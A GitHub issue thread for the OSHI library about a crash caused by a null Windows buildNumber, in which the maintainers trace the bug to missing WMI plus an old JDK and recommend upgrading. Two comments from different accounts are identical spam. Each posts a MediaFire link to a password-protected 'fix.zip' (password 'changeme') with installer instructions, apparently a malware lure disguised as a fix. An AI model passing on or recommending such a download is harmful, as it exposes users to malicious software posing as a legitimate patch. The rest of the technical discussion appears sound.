### ISSUE TITLE
Crash in some systems with failure to get buildNumber

### ISSUE THREAD

**Issue by robert-dbvis** [oshi/oshi#2714]
We have gotten stack traces from customers where initialization of the detector crashes:

```
java.lang.ExceptionInInitializerError
	at com.jthemedetecor.OsThemeDetector.getDetector(OsThemeDetector.java:43)
	at com.onseven.dbvis.util.gui.plaf.SystemLookAndFeelDetector.<clinit>(SystemLookAndFeelDetector.java:14)
...
Caused by: java.lang.NullPointerException: Cannot invoke "String.compareTo(String)" because "buildNumber" is null
	at oshi.software.os.OperatingSystem$OSVersionInfo.<init>(OperatingSystem.java:510)
	at oshi.software.os.windows.WindowsOperatingSystem.queryFamilyVersionInfo(WindowsOperatingSystem.java:172)
	at oshi.util.Memoizer$1.get(Memoizer.java:87)
	at oshi.software.common.AbstractOperatingSystem.getVersionInfo(AbstractOperatingSystem.java:76)
	at com.jthemedetecor.util.OsInfo.<clinit>(OsInfo.java:27)
```

I have yet to understand why and I do not know Windows all that well to say why this happens.

We are currently using an older version: oshi-core-5.8.6.jar, but looking through the issues (both open and closed) and the code changes it seems to me that the issue still exists (but the code is slightly changed so the top of the NPE will be on another line).
I do not have access to a machine where this issue happens so I can not check if upgrading to latest oshi-core would help.

My best guess would be that the OS is locked down and that the user may not query the build number / have access to WMI.

I still think that the NPE should not occur.

We will try to refactor our application to be more resistant to these kind of problem. A fix would still be nice for us and others.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mprins** [comment]
looking at the current code there does not seem to be an obvious way for `buildNumber` to be null as it boils down to https://github.com/oshi/oshi/blob/50c29e7e4c71fd274adbdcc29fb293345731f787/oshi-core/src/main/java/oshi/util/platform/windows/WmiUtil.java#L129-L136 

Please try to reproduce with a supported version, 5.8.6 being dating back to Dec 15, 2021, there will not be a fix in that.

**Comment by dbwiddis** [comment]
Also, the particular bug was introduced in #1707 in version 5.8.2.

All because Microsoft decided to keep Windows at an actual version 10 but rebrand it as 11. 😏

**Comment by dbwiddis** [comment]
> it seems to me that the issue still exists (but the code is slightly changed so the top of the NPE will be on another line).

In case my reference to #2224 wasn't clear enough, the file diff on that PR shows you the relevant bits of code.
 - The error was associated with `buildNumber` being null, and bypassing the conditional in WMI as there were 0 results (for some unknown reason)
 - This WMI path is a backup path for when the correct version/build is not determined correctly by the JDK; so not only does this customer have WMI disabled, they also have a JDK older than September 2021.
 - The NPE occurred in the line `if ("10".equals(version) && buildNumber.compareTo("22000") >= 0) {` in `OperatingSystem`.
 - That line still exists in `WindowsOperatingSystem` but since `buildNumber` is now initialized to an empty string, it does not throw an NPE.  It still may fail to identify the correct windows version (which the JDK already failed to do!)

TLDR: upgrade to OSHI >= 6.3.1 (or downgrade to < 5.8.2) and also upgrade the JDK on the impacted machine, which likely has multiple missing security patches.

**Comment by robert-dbvis** [comment]
Ok, great to hear that you think this is fixed. I will try to get us to upgrade. 
Looking at the change there, it was not obvious to me, my thought was that the line call to "WmiUtil.getString" returned null, but if we do not get there (, that is if we do not enter the"if (versionInfo.getResultCount() > 0) {" the block), then I agree that it looks fixed.
It is hard to test this, it only happens in customer environment so not sure if/when I can report back. We are also making our code more safe against problems like this (adding a few catch-blocks and dealing with missing information). 

I guess that mean that we can close this and say that it is most probably fixed by an upgrade on our end.

Thank you!

**Comment by dbwiddis** [comment]
> it is most probably fixed by an upgrade on our end.

This specific bug is fixed.  Can't promise there aren't other bugs. ;) 

Having made few changes in the last couple of years I keep thinking there will be no more bug reports, but the reality is there are some edge cases (no WMI + old JDK) that occasionally pop up.   Appreciate the bug report even if it was (unknowingly) fixed.
